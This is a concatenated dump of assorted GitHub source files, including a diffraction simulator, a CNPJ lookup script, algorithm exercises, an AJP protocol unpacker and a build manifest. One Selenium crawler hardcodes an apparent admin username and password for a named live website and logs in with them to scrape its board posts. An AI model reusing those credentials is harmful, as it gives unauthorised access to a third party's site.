30:\n N_gauss = 20\n elif peak < 70:\n N_gauss = 20\n else:\n N_gauss = 20\n xn, wn = np.polynomial.legendre.leggauss(N_gauss)\n deltan = (peak+phi_min(peak))/2 + (peak-phi_min(peak))*xn/2\n tmp_assy = np.zeros(len(theta2[a:b]))\n i = 
0\n sum2 = np.sum(wn*W2(deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180))\n arr1 = wn*W2(deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180)\n for phi in theta2[a:b]:\n # print(deltan)\n sum1 = np.sum(arr1 * lorenz(phi, deltan, peak))\n tmp_assy[i] = sum1/sum2\n i = i+1\n tmp_assy = tmp_assy / np.sum(tmp_assy) / step * factors[peak_i]\n #y += y_tmp\n #print(y)\n return (a, b, tmp_assy)\n #y_none[a:b] += tmp\n\n\ndef truncated_normal(mean, stddev, minval, maxval, n):\n a, b = (minval - mean) / stddev, (maxval - mean) / stddev\n r = truncnorm(a,b, loc = mean, scale = stddev)\n return(r.rvs(n))\n\n\ndef dmin (angle = 90):\n return lambd / np.sin(angle/180*np.pi) / 2\n\ndef XRS(groups, cell, elemental):\n xrs = random_structure.xray_structure(\n space_group_info = sgtbx.space_group_info(groups),\n elements = elemental,\n unit_cell = cell)\n a = xrs.structure_factors(d_min= dmin()).f_calc().sort()\n I = a.as_intensity_array().data().as_numpy_array()\n m = a.multiplicities().data().as_numpy_array()\n for i in range(len(m)):\n I[i] *= m[i]\n Ind = list(a.indices())\n D = a.d_spacings().data().as_numpy_array()\n T2 = a.two_theta(lambd, deg = True).data().as_numpy_array()\n return I, Ind, D, T2\n\n\nif __name__ == '__main__':\n N = 3 #number of pictures\n\n cell_a = truncated_normal(10.05493, 2.792331, 2, 10000, N)\n cell_b = truncated_normal(12.18931, 3.201324, 2, 10000, N)\n cell_c = truncated_normal(15.10612, 4.623489, 2, 10000, N)\n angle_a = truncated_normal(90, 13.83713, 40, 140, N)\n angle_b = truncated_normal(90, 11.86436, 40, 140, N)\n angle_c = truncated_normal(90, 14.70701, 40, 140, N)\n\n\n\n #setting parameters for assymetry\n L, H, S = 720, 7.5, 10.7\n cells = list(zip(cell_a, cell_b, cell_c, angle_a, angle_b, angle_c))\n groups = \"P-1\" #setting for groups\n elemental = [[\"C\"]*randrange(6, 15) for i in range(N)] #setting for elemets\n for i in range(N):\n factors, index, d_s, theta_peaks = XRS(groups, cells[i], elemental[i])\n theta2 = np.arange(1, 90, 0.005)\n theta_peaks = theta_peaks[theta_peaks < 89] # берем только нужные пики\n #print(range(len(theta_peaks)))\n step = theta2[1] - theta2[0]\n y = np.zeros(len(theta2))\n #y_none = np.zeros(len(theta2))\n\n with Pool(processes = 8) as p:\n z = p.map(pool_peaks2, range(len(theta_peaks))) #ассиметрия пиков\n #print(z)\n for j in z:\n y[j[0]:j[1]] += j[2]\n #print(y_end)\n #y.wait()\n y = np.multiply(y, LP_Factor(theta2))\n #print(y_end)\n #y_none = np.multiply(y_none, LP_Factor(theta2))\n coeffs = np.random.normal(loc = 0, scale = 1, size = 14)\n xx = np.linspace(-1, 1, len(theta2))\n yy = np.polynomial.chebyshev.chebval(xx, coeffs)\n a, b = 0.2, 90\n x1, x2 = -1, 1 #background\n xx = (a - b)/(x1 - x2)*xx + (b*x1-a*x2)/(x1-x2)\n a, b = 0, 25000\n y1, y2 = np.min(yy), np.max(yy)\n yy = (a - b)/(y1 - y2)*yy + (b*y1-a*y2)/(y1-y2)\n y += yy\n #y_none += yy\n file = open('./cryst_edit'+str(i)+'.txt', 'w')\n for j in range(0, len(theta2), 1):\n file.write(str(theta2[j])+ ' ' + str(y[j]))\n file.write('\\n')\n file.close()\n","repo_name":"blackwood168/random_diffraction","sub_path":"random_proga_pool_edit.py","file_name":"random_proga_pool_edit.py","file_ext":"py","file_size_in_byte":6851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"19910228869","text":"import requests\nimport json\nimport time\nimport pandas\n\ndef importar_csv(endereco):\n tabela = pandas.read_excel(endereco)\n total_cnpj = []\n for linha in tabela['cnpj']:\n 
total_cnpj.append(str(linha).rjust(14, '0'))\r\n    return total_cnpj\r\n\r\ndef cria_arquivo(endereco):\r\n    # Create the file\r\n    arquivo = open(endereco, 'w')\r\n    #arquivo.write(texto)\r\n    arquivo.close()\r\n\r\ndef atualizar_arquivo(endereco, lista):\r\n    arquivo = open(endereco, 'a')\r\n    for i in range(len(lista)):\r\n        valor = lista[i]\r\n        arquivo.write(valor + ',')\r\n    arquivo.write('\\n')\r\n    #print(lista)\r\n    arquivo.close()\r\n\r\ndef ler_arquivo(endereco):\r\n    arquivo = open(endereco, 'r')\r\n    texto = arquivo.read()\r\n    print(texto)\r\n\r\n#Lookup limited to 3 CNPJs per minute\r\n#https://www.sintegraws.com.br/api/documentacao-api-receita-federal.php\r\ndef api_cnpj(lista_cnpj, loop):\r\n    lista_dados = []\r\n    for cnpj in lista_cnpj:\r\n        url = f\"https://receitaws.com.br/v1/cnpj/{cnpj}\"\r\n        querystring = {\"token\":\"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\"cnpj\":\"06990590000123\",\"plugin\":\"RF\"}\r\n        try:\r\n            consulta = requests.request(\"GET\", url, params=querystring)\r\n            dado = json.loads(consulta.text)\r\n            # API accessed successfully.\r\n            ativ1 = dado['atividade_principal']\r\n            cnae_cod1 = ativ1[0]['code'].replace(\",\",\";\")\r\n            cnae_text1 = ativ1[0]['text'].replace(\",\",\";\")\r\n            cont = 0\r\n            ativ2 = dado['atividades_secundarias']\r\n            while cont < len(ativ2):\r\n                if cont == 0:\r\n                    cnae_cod2 = ativ2[cont]['code'].replace(\",\",\";\")\r\n                    cnae_text2 = ativ2[cont]['text'].replace(\",\",\";\")\r\n                else:\r\n                    cnae_cod2 = cnae_cod2 + ',' + ativ2[cont]['code'].replace(\",\",\";\")\r\n                    cnae_text2 = cnae_text2 + ',' + ativ2[cont]['text'].replace(\",\",\";\")\r\n                cont = cont + 1\r\n\r\n            lista_dados.append(\r\n                [\r\n                    dado['cnpj'],\r\n                    dado['nome'],\r\n                    # dado['numero'],\r\n                    # dado['complemento'],\r\n                    dado['cep'],\r\n                    # dado['bairro'],\r\n                    dado['municipio'],\r\n                    dado['uf'],\r\n                    # dado['email'],\r\n                    # dado['telefone']\r\n                    #cnae_cod1,\r\n                    #cnae_text1,\r\n                    #cnae_cod2,\r\n                    #cnae_text2\r\n                ]\r\n            )\r\n        except Exception as erro:\r\n            lista_dados.append(\r\n                [\r\n                    'erro',\r\n                    'erro',\r\n                    'erro',\r\n                    'erro',\r\n                    'erro',\r\n                    'erro'\r\n                ]\r\n            )\r\n        #Pause in the code because of the 3-CNPJs-per-minute query limit\r\n        if loop >3:\r\n            time.sleep(70)\r\n\r\n    return lista_dados\r\n\r\ndiretorio = 'C:/Users/andremt/OneDrive - Votorantim/Documentos/Python/'\r\n\r\n#Read the xlsx with the CNPJs\r\nnome_arquivo = 'Lista_CNPJ.xlsx'\r\nendereco = diretorio + nome_arquivo\r\ntotal_cnpj = importar_csv(endereco)\r\n\r\n#File that will receive the query results\r\nnome_arquivo = 'CNPJs.txt'\r\nendereco = diretorio + nome_arquivo\r\ncria_arquivo(endereco)\r\n\r\nlista_cnpj = []\r\ni=0\r\n\r\nwhile i <= len(total_cnpj):\r\n    lista_cnpj = total_cnpj[i:i+3]\r\n    i += 3\r\n    print(lista_cnpj)\r\n    lista_dados = api_cnpj(lista_cnpj, len(total_cnpj))\r\n    j=0\r\n    for j in range(len(lista_dados)):\r\n        atualizar_arquivo(endereco, lista_dados[j])","repo_name":"AndreTsuji/estudo-python","sub_path":"api_cnpj.py","file_name":"api_cnpj.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6817600749","text":"#! 
/usr/bin/python3\n\nimport json\nimport sys\n\nwith open(\"cgminer.conf\", \"w\") as file:\n try:\n cgminerconf = json.load(sys.stdin)\n except:\n file.close()\n exit(1)\n file.write(json.dumps(cgminerconf, indent=4, separators=(',', ':'), sort_keys=True))\n file.close()\n\n","repo_name":"arijan/cgmrrd","sub_path":"putconf.py","file_name":"putconf.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"71134794248","text":"from random import randint, shuffle, seed\r\n\r\n\r\ndef partition(T, p, r):\r\n T[p], T[r] = T[r], T[p]\r\n x = T[r]\r\n i = p-1\r\n for j in range(p, r):\r\n if T[j] < x:\r\n i += 1\r\n T[i], T[j] = T[j], T[i]\r\n T[r], T[i+1] = T[i+1], T[r]\r\n return i+1\r\n\r\n\r\ndef median_of_five(T, p, r, step):\r\n for i in range(r, p, -step):\r\n for j in range(p, i, step):\r\n if T[j] > T[j+step]:\r\n T[j], T[j+step] = T[j+step], T[j]\r\n tmp = p+step*(((r-p)//step)//2)\r\n T[p], T[tmp] = T[tmp], T[p]\r\n\r\n\r\ndef select(T, p, r):\r\n step = 1\r\n while r-p >= step:\r\n for i in range(p, r, 5*step):\r\n median_of_five(T, i, min(i+5*step-1, r), step)\r\n step *= 5\r\n r = r-r % (step)\r\n\r\n\r\ndef linearselect(T, k):\r\n p = 0\r\n r = len(T)-1\r\n while True:\r\n select(T, p, r)\r\n q = partition(T, p, r)\r\n if q == k:\r\n return T[q]\r\n elif k < q:\r\n r = q-1\r\n else:\r\n p = q+1\r\n\r\n\r\nseed(42)\r\n\r\nn = 11\r\nfor i in range(n):\r\n A = list(range(n))\r\n shuffle(A)\r\n print(A)\r\n x = linearselect(A, i)\r\n if x != i:\r\n print(\"Blad podczas wyszukiwania liczby\", i)\r\n exit(0)\r\n\r\nprint(\"OK\")\r\n","repo_name":"BlazejNowicki/ASD","sub_path":"offline/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"23126656402","text":"from bayserver_core.bay_log import BayLog\nfrom bayserver_core.sink import Sink\nfrom bayserver_core.protocol.command_unpacker import CommandUnPacker\n\nfrom bayserver_docker_ajp.ajp_type import AjpType\nfrom bayserver_docker_ajp.command.cmd_data import CmdData\nfrom bayserver_docker_ajp.command.cmd_end_response import CmdEndResponse\nfrom bayserver_docker_ajp.command.cmd_forward_request import CmdForwardRequest\nfrom bayserver_docker_ajp.command.cmd_get_body_chunk import CmdGetBodyChunk\nfrom bayserver_docker_ajp.command.cmd_send_body_chunk import CmdSendBodyChunk\nfrom bayserver_docker_ajp.command.cmd_send_headers import CmdSendHeaders\nfrom bayserver_docker_ajp.command.cmd_shutdown import CmdShutdown\n\nclass AjpCommandUnPacker(CommandUnPacker):\n\n def __init__(self, handler):\n self.cmd_handler = handler\n self.reset()\n\n def reset(self):\n pass\n\n def packet_received(self, pkt):\n\n BayLog.debug(\"ajp: packet received: type=%d data len=%d\", pkt.type, pkt.data_len())\n\n if pkt.type == AjpType.DATA:\n cmd = CmdData()\n\n elif pkt.type == AjpType.FORWARD_REQUEST:\n cmd = CmdForwardRequest()\n\n elif pkt.type == AjpType.SEND_BODY_CHUNK:\n cmd = CmdSendBodyChunk(pkt.buf, pkt.header_len, pkt.data_len)\n\n elif pkt.type == AjpType.SEND_HEADERS:\n cmd = CmdSendHeaders()\n\n elif pkt.type == AjpType.END_RESPONSE:\n cmd = CmdEndResponse()\n\n elif pkt.type == AjpType.SHUTDOWN:\n cmd = CmdShutdown()\n\n elif pkt.type == AjpType.GET_BODY_CHUNK:\n cmd = CmdGetBodyChunk()\n\n else:\n raise Sink()\n\n cmd.unpack(pkt)\n return cmd.handle(self.cmd_handler) # visit\n\n def need_data(self):\n return 
self.cmd_handler.need_data()\n","repo_name":"baykit/BayServer_Python","sub_path":"packages/bayserver-docker-ajp/bayserver_docker_ajp/ajp_command_unpacker.py","file_name":"ajp_command_unpacker.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36173358057","text":"# Conversion from a Roman numeral to an Arabic number\r\n\r\n# Roman numeral values\r\nromai = {'I':1,\r\n 'V':5,\r\n 'X':10,\r\n 'L':50,\r\n 'C':100,\r\n 'D':500,\r\n 'M':1000}\r\n\r\nwhile True:\r\n # Read input\r\n be = input('Római szám: ').upper()\r\n if be == '':\r\n break\r\n # Value of each numeral\r\n ertekek = [romai[c] for c in be]\r\n # Sign of each numeral (negative when a larger numeral follows)\r\n elojelek = [1 if i == len(be)-1 or romai[be[i]] >= romai[be[i+1]] else -1 for i in range(len(be))]\r\n # Sum and print\r\n print(sum(e * j for e, j in zip(ertekek, elojelek)))\r\n","repo_name":"radamhu/prog101","sub_path":"python101/python2/16 Szótárak 1/Források/romai.py","file_name":"romai.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36713052941","text":"class LinkedList:\n    def __init__(self):\n        \"\"\"Initializes an empty linked list with a null head\"\"\"\n        self.head = None\n\n    def kth_from_end(self, k):\n        \"\"\"\n        Takes an integer k as input and returns the value of the node that is k places from the tail of the linked list.\n\n        Args:\n            k (int): The index of the node from the tail of the linked list.\n\n        Returns:\n            int: The value of the node that is k places from the tail of the linked list.\n\n        Raises:\n            ValueError: If k is less than 0 or greater than the length of the linked list.\n        \"\"\"\n        if k < 0:\n            raise ValueError(\"k must be a positive integer\")\n\n        p1 = self.head\n        p2 = self.head\n\n        for i in range(k):\n            if p1 is None:\n                raise ValueError(\"k is greater than the length of the linked list\")\n            p1 = p1.next\n\n        if p1 is None:\n            return self.head.value\n\n        while p1.next is not None:\n            p1 = p1.next\n            p2 = p2.next\n\n        return p2.value\n\n    def find_middle(self):\n        \"\"\"\n        Returns the value of the node at the middle of the linked list.\n\n        Returns:\n            int: The value of the node at the middle of the linked list.\n\n        \"\"\"\n        if self.head is None:\n            return None\n\n        p1 = self.head\n        p2 = self.head\n\n        while p1 is not None and p1.next is not None:\n            p1 = p1.next.next\n            p2 = p2.next\n\n        return p2.value\n","repo_name":"mohammadalsmadi2000/data-structures-and-algorithms","sub_path":"linked-list-kth/linked-list-kth/linked-list-kth.py","file_name":"linked-list-kth.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6977416249","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\nimport os\nimport stdlib\nfrom stdlib.template.configure import configure\nfrom stdlib.template import autotools\nfrom stdlib.manifest import manifest\n\n\n@manifest(\n    name='sqlite',\n    category='dev-libs',\n    description='''\n    A C library that implements a self-contained, serverless, zero-configuration, transactional SQL database engine.\n    ''',\n    tags=['sql', 'db'],\n    maintainer='grange_c@raven-os.org',\n    licenses=[stdlib.license.License.PUBLIC_DOMAIN],\n    upstream_url='https://www.sqlite.org/',\n    kind=stdlib.kind.Kind.EFFECTIVE,\n    versions_data=[\n        {\n            'semver': '3.30.1',\n            'fetch': [{\n                'url': 'https://sqlite.org/2019/sqlite-autoconf-3300100.tar.gz',\n                'sha256': '8c5a50db089bd2a1b08dbc5b00d2027602ca7ff238ba7658fabca454d4298e60',\n            }],\n        },\n    ],\n)\ndef build(build):\n    os.environ['CFLAGS'] += '''\\\n    -DSQLITE_ENABLE_FTS3=1 \\\n    -DSQLITE_ENABLE_FTS4=1 \\\n    
-DSQLITE_ENABLE_COLUMN_METADATA=1 \\\n    -DSQLITE_ENABLE_UNLOCK_NOTIFY=1 \\\n    -DSQLITE_ENABLE_DBSTAT_VTAB=1 \\\n    -DSQLITE_SECURE_DELETE=1 \\\n    -DSQLITE_ENABLE_FTS3_TOKENIZER=1\\\n    '''\n\n    return autotools.build(\n        configure=lambda: configure(\n            '--enable-fts5',\n        )\n    )\n","repo_name":"raven-os/nbuild-manifests","sub_path":"dev-libs/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +
{"seq_id":"45120930295","text":"import requests, xmltodict, json\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nfrom urllib import parse\r\nimport datetime as dt\r\nimport urllib3\r\nimport traceback\r\nimport os\r\nimport openpyxl\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import urljoin\r\nfrom selenium import webdriver\r\n\r\n#used for the notice board; may differ depending on the purpose\r\nfrom selenium.common import UnexpectedAlertPresentException\r\n\r\n\r\ndef void(): #serves as main; define any other functions above this with def\r\n while True:\r\n try:\r\n print(\"hello\")\r\n c = input(\"종료하려면 x를 누르세요 : \")\r\n if c == 'x':\r\n break\r\n time.sleep(1)\r\n\r\n ### Login window ###\r\n\r\n USER=\"admin\"\r\n PW=\"adminadmin\"\r\n\r\n urls = 'https://www.costac.co.kr/bbs/login.php'\r\n driver = webdriver.Chrome('C:/Users/skflc/PycharmProjects/pythonProject/chromedriver_win32/chromedriver.exe')\r\n driver.get(urls)\r\n\r\n driver.find_element_by_id('login_id').send_keys('admin')\r\n driver.find_element_by_id('login_pw').send_keys('adminadmin')\r\n driver.find_element_by_css_selector('#login_fs > input.btn_submit').click()\r\n\r\n aaa = input(\"종료하려면 x를 누르세요 : \")\r\n if aaa == 'x':\r\n break\r\n #end of the login and test section\r\n mCols = []\r\n df = pd.DataFrame(columns=mCols)\r\n excel_file = openpyxl.Workbook()\r\n excel_sheet = excel_file.active\r\n excel_sheet.title = '테스트'\r\n excel_sheet.append(['이', '액셀은', '역순으로', '작성', '되었음', '22-06-20']) # comment this out for forward-order processing\r\n excel_sheet.append(['번호', '제목', '내용(selectone)', '내용(select)', '작성자', '작성시각'])\r\n dir = 'C:\\\\Users\\\\skflc\\\\Desktop\\\\test0615\\\\testS0624Fin.xlsx'\r\n btitles = []\r\n brticles = []\r\n brticles2 = []\r\n buths = []\r\n btimes = []\r\n\r\n j = 1 # post number\r\n\r\n # the loop starts here\r\n for i in range(820, 3, -1): #forward order would be 4,813\r\n try:\r\n jj = str(j)\r\n ii = str(i)\r\n url = 'https://www.costac.co.kr/bbs/board.php?bo_table=form_service&wr_id=' + ii\r\n #url = 'https://www.costac.co.kr/bbs/board.php?bo_table=sim_report&wr_id=' + ii\r\n print(url)\r\n # source = requests.get(url, verify=False)\r\n source = driver.get(url)\r\n\r\n # branch point: source.status_code\r\n\r\n # html = source.text\r\n html = driver.page_source\r\n soap = BeautifulSoup(html, 'html.parser')\r\n article = soap.select_one('#bo_v_con')\r\n article2 = soap.select('#bo_v_con')\r\n title = soap.select_one('#bo_v_title') # title\r\n auth = soap.select_one('#bo_v_info > ul > li:nth-child(1) > strong > span') # author\r\n wtime = soap.select_one('#bo_v_info > ul > li:nth-child(2) > strong') # time written\r\n\r\n #title, author and written time are read through get_text\r\n # form_result > table\r\n # form_result > div:nth-child(2) > table.table1\r\n # form_result > div:nth-child(4) > table\r\n # form_result > div:nth-child(2) > table.gunmul\r\n # table/table1,gunmul,table3,gdTable\r\n # content > section > article > form > div > table:nth-child(1)\r\n\r\n\r\n\r\n # time.sleep(1)\r\n\r\n ## print(soap)\r\n # print('-----------------------------')\r\n # print(article)\r\n # print('-----------------------------')\r\n ## print(article.get_text())\r\n brticle = str(article)\r\n brticle2 = str(article2)\r\n crticle = article.text\r\n drticle = article.string\r\n\r\n\r\n\r\n #btitle = str(title)\r\n #buth = str(auth)\r\n #btime = str(wtime)\r\n btitle = title.get_text()\r\n buth = auth.get_text()\r\n btime = wtime.get_text()\r\n btime = '20'+btime+' 00:00:'+str(i//180)+str(i%10)\r\n #print(btime)\r\n\r\n #time.sleep(20)\r\n excel_sheet.append([jj, btitle, brticle, brticle2, buth, btime])\r\n btitles.append(btitle)\r\n brticles.append(brticle)\r\n brticles2.append(brticle2)\r\n buths.append(buth)\r\n btimes.append(btime)\r\n\r\n #excel_sheet.append(['공백'])\r\n print('-----------'+jj + '번째 실행------------------------------------------------------------------------------------------------------------------------')\r\n print(brticle + \" \" + brticle2 + \" \" + buth + \" \" + btime + \" \" + btitle)\r\n j = j + 1\r\n\r\n # time.sleep(2) # in case timing is the cause? it is not, though\r\n\r\n #eee = input(\"종료하려면 x를 누르세요 : \")\r\n\r\n #if eee == 'x':\r\n #break\r\n except UnexpectedAlertPresentException as UAPE:\r\n print(UAPE)\r\n print(\"일시적인 오류이거나 글이 존재하지 않습니다.\")\r\n print(url)\r\n time.sleep(1)\r\n excel_sheet.append(['오류'])\r\n continue\r\n # pass\r\n\r\n ## source = requests.get(url, verify=False)\r\n\r\n ## article = soap2.select_one('#bo_v_con')\r\n ## article2 = soap2.select_one('#bo_v_atc')\r\n\r\n\r\n\r\n\r\n time.sleep(1)\r\n # post content: bo_v_con\r\n\r\n excel_file.save(dir)\r\n df['btitle'] = btitles\r\n df['brticle'] = brticles\r\n df['brticle2'] = brticles2\r\n df['buth'] = buths\r\n df['btime'] = btimes\r\n df.to_excel('C:/Users/skflc/Desktop/' + ' 0624finS2.xlsx')\r\n\r\n\r\n time.sleep(1)\r\n print(\"액셀파일 생성이완료됨\")\r\n d = input(\"종료하려면 x를 누르세요 : \")\r\n if d == 'x':\r\n break\r\n\r\n except Exception as e:\r\n print(e)\r\n print(traceback.format_exc())\r\n print('예기치 못한 오류가 발생했습니다.')\r\n print('3초뒤 다시 시작합니다')\r\n time.sleep(3)\r\n\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) #suppress the warning popup\r\nrequests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += 'HIGH:!DH:!aNULL'\r\ntry:\r\n requests.packages.urllib3.contrib.pyopenssl.DEFAULT_SSL_CIPHER_LIST += 'HIGH:!DH:!aNULL'\r\nexcept AttributeError:\r\n # no pyopenssl support used / needed / available\r\n pass\r\n\r\n# copy-pasted this for now but I cannot figure out why it is needed... it does not even seem to be a verify issue? see: https://stackoverflow.com/questions/38015537/python-requests-exceptions-sslerror-dh-key-too-small\r\n\r\nvoid()\r\n\r\n\r\n# almost every case proceeds like this\r\n# page numbers must also be read separately. Even after reading every post on a page there must be code that moves on to the next page. This does not matter when post numbers alone are enough.\r\n# individual post numbers are not sequential either, so it should be written to try only when the response is 200.\r\n# if 200 = append post content else = append error 404\r\n# 0624 the content itself is fine but errors keep occurring, which suggests the problem is in pyxl.append...\r\n# a version that switched from saving with pyexcel to saving the Excel with pandas, because the pyexcel append gets cut off for some reason","repo_name":"kimjunghyun2/mystreamlit","sub_path":"0624crawiling.py","file_name":"0624crawiling.py","file_ext":"py","file_size_in_byte":8156,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"47172598580","text":"# Given a string s consisting of small English letters, find and return the first instance of a non-repeating character in it. If there is no such character, return '_'.\n\n# Example\n\n# For s = \"abacabad\", the output should be\n# first_not_repeating_character(s) = 'c'.\n\n# There are 2 non-repeating characters in the string: 'c' and 'd'. 
Return c since it appears in the string first.\n\n# For s = \"abacabaabacaba\", the output should be\n# first_not_repeating_character(s) = '_'.\n\n# There are no characters in this string that do not repeat.\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] string s\n\n# A string that contains only lowercase English letters.\n\n# [output] char\n\n# The first non-repeating character in s of '_' if there are no characters that do not repeat.\nfrom collections import Counter\ndef first_not_repeating_character(s):\n# use a set for unique characters\n# or use a count of each character. if only 1 return character\n# else return \"_\"\n count = Counter(s)\n returnchar = \"\"\n boolean = False\n for num in count:\n if count[num] == 1:\n returnchar += num\n boolean = True\n break\n if boolean == False:\n returnchar = \"_\"\n return returnchar","repo_name":"jordan-hanson/codesignal-practice","sub_path":"Python/firstnotrepeatingcharacter.py","file_name":"firstnotrepeatingcharacter.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20724454115","text":"# you can write to stdout for debugging purposes, e.g.\n# print(\"this is a debug message\")\n\ndef solution(A):\n # write your code in Python 3.8.10\n num = {}\n for i in range(len(A)):\n if A[i] in num:\n num[A[i]] += 1\n else:\n num[A[i]] = 1\n\n for elemt in num:\n if num[elemt] % 2 != 0:\n return elemt","repo_name":"Angela-OH/Algorithm","sub_path":"codility/lesson2_2.py","file_name":"lesson2_2.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43346014501","text":"\"\"\"\nIncluded here: Day 10 of 30 Days to Code.\nSee the Jupyter Notebook for more notes related to this tutorial.\n\"\"\"\n\n#func that converts decimal to binary, returns string of bits, only works for <= 16-bit numbers\ndef Decimal2Binary(num): \n def innerAlg(num):\n #base case\n if num == 1: #last step has a dividend of 1\n return str(num % 2) #last steps bit is the left-most bit overall\n #recursive case\n remain = num % 2 #becomes bit for this step of the conversion\n #integer division here to get the dividend for the next step\n dividend = num // 2 #becomes dividend of next step, divisor of 2 always\n return str(innerAlg(dividend)) + str(remain) #bit from first step is the right-most bit\n\n #this function combines the output from before with leading zeros to represent the binary \n #number as a 16-bit or 2-byte number\n def innerFormat(string):\n bits = len(string) #number of bits from conversion to binary\n count = 16 - bits #finding number of needed leading zeros\n leadingZero = count * '0' #creating string to horizontally cat to binary number\n return leadingZero + string #returning the 16-bit number\n str1 = innerAlg(num) #calling the conversion scripts\n return innerFormat(str1) #returning the converted number, in binary, as a string\n \nDecimalNumber = 55 #number to convert to binary \nprint(f'{DecimalNumber} as a 16-bit binary number is:',Decimal2Binary(DecimalNumber))\n\n#Part of the Day 10 Coding Challenge, supposed to convert number then provide \n#the largest grouping of consecutive bits that are equal to 1\nBinStr = Decimal2Binary(DecimalNumber)\nBinaryNumber = BinStr\nBinStr = BinStr.split('0') #splits up the string at the zeros, reults in the groupings of 1's and empty elements\n#where the zeros once were\n\n#iterate through the string array, take only 
the elements that are not empty, find the length of each element,\n#find the element with the largest length, return that as the largest grouping of consecutive ones in the binary number.\nBinCount = max([len(num) for num in BinStr if num != ''])\nprint(f'The largest grouping of consecutive ones in the binary representation of {DecimalNumber} is:',BinCount)\n\ndef Binary2Decimal(num):\n #base cases\n if len(num) == 1 and num == str(1): #if the right most bit is 1, raise it tot he zero power\n return 2**0\n if len(num) == 1 and num != str(1): #if the right most bit is zero, pass back a zero for the summation of converted bits\n return 0\n\n #recursive cases\n bitlen = len(num) - 1 #get the exponent of the 2 for this bit\n current_bit = num[0] #keep the current bit to see if it'll become 0 or 2 raised to the exponent \n num = num[1::] #only pass the following right bits to the next step of the recursion\n if current_bit == str(1): #if the current bit is one, raise it to the exponent and got to the next recursion step\n return int(Binary2Decimal(num)) + 2**bitlen\n return int(Binary2Decimal(num)) + 0 #if the current bit is zero, make the conversion 0 and go to the next step of recursion \n\nprint(f'The binary number {BinaryNumber} represented in decimal is:',Binary2Decimal(BinaryNumber))","repo_name":"freddydrew/HackerRank","sub_path":"30DaysToCode/HowToBinaryPractice.py","file_name":"HowToBinaryPractice.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3223981331","text":"import warnings\nwarnings.filterwarnings('ignore')\n\nimport json, os, re, scipy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nimport matplotlib.colors as mcolors\nimport pandas as pd\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport seaborn as sns\nfrom fitter import Fitter, get_common_distributions, get_distributions\n\n\n\n# This finds our json files\nprint(\"This finds our json files\")\nloop = True\nwhile loop:\n# path_to_json = str(input(\"Directory of Json files (which should starts and ends with /): \"))\n path_to_json = './results/'\n # Store the in List called: json_files\n try:\n # Store the in List called: json_files\n json_files = [pos_json for pos_json in os.listdir(path_to_json) if pos_json.endswith('.json')]\n except:\n # if path is empty will get Error\n print(\"Error\")\n\n if len(json_files) != 0:\n loop = False\n\n\n# Here I define a list to store each json file as a DataFrame in a list\njson_list = list()\n\n# we need both the json and an index number so use enumerate()\nfor index,js in enumerate(json_files):\n with open(os.path.join(path_to_json, js)) as json_file:\n # Finding the location of gNodeB\n g_loc = re.findall('[x-y-p][\\d]{1,100}',js)\n\n # Loading Json\n json_text = json.load(json_file,parse_float=True)\n\n # Create DataFrame\n j_pd = pd.DataFrame.from_dict(json_text.items(),dtype=float)\n j_pd.columns = ['Location','BLER'+str(' in ')+str(g_loc[0])+str('-')+str(g_loc[1])+str('-')+str(g_loc[2])]\n\n # For taking locations as a seperate DF\n if index == 0:\n # Append seperatly\n json_list.append(j_pd[['Location']])\n json_list.append(j_pd[['BLER'+str(' in ')+str(g_loc[0])+str('-')+str(g_loc[1])+str('-')+str(g_loc[2])]])\n else :\n # for rest of indexes except '0'\n json_list.append(j_pd[['BLER'+str(' in 
